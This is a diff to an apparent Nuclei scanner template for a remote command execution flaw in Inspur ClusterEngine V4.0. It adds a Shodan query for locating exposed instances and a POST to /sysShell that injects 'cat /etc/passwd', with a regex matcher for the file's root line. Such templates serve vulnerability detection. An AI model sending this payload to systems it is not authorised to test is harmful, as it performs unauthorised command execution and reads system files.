--- a/vulnerabilities/other/inspur-clusterengine-v4-sysshell-rce.yaml
+++ b/vulnerabilities/other/inspur-clusterengine-v4-sysshell-rce.yaml
@@ -6,6 +6,9 @@ info:
   severity: critical
   reference:
     - https://github.com/PeiQi0/PeiQi-WIKI-POC/blob/master/PeiQi_Wiki/%E6%9C%8D%E5%8A%A1%E5%99%A8%E5%BA%94%E7%94%A8%E6%BC%8F%E6%B4%9E/%E6%B5%AA%E6%BD%AE/%E6%B5%AA%E6%BD%AEClusterEngineV4.0%20sysShell%20%E8%BF%9C%E7%A8%8B%E5%91%BD%E4%BB%A4%E6%89%A7%E8%A1%8C%E6%BC%8F%E6%B4%9E.md
+  metadata:
+    verified: true
+    shodan-query: title="TSCEV4.0"
   tags: inspur,clusterengine,rce
 
 requests:
@@ -14,17 +17,16 @@ requests:
         POST /sysShell HTTP/1.1
         Host: {{Hostname}}
 
-        op=doPlease&node=cu01&command=cat /etc/passwd
+        op=doPlease&node=cu01&command=cat+/etc/passwd
 
     redirects: true
     max-redirects: 2
     matchers-condition: and
     matchers:
-
-      - type: word
-        words:
-          - "root:[x*]:0:0:"
+      - type: regex
         part: body
+        regex:
+          - "root:.*:0:0:"
 
       - type: status
         status:
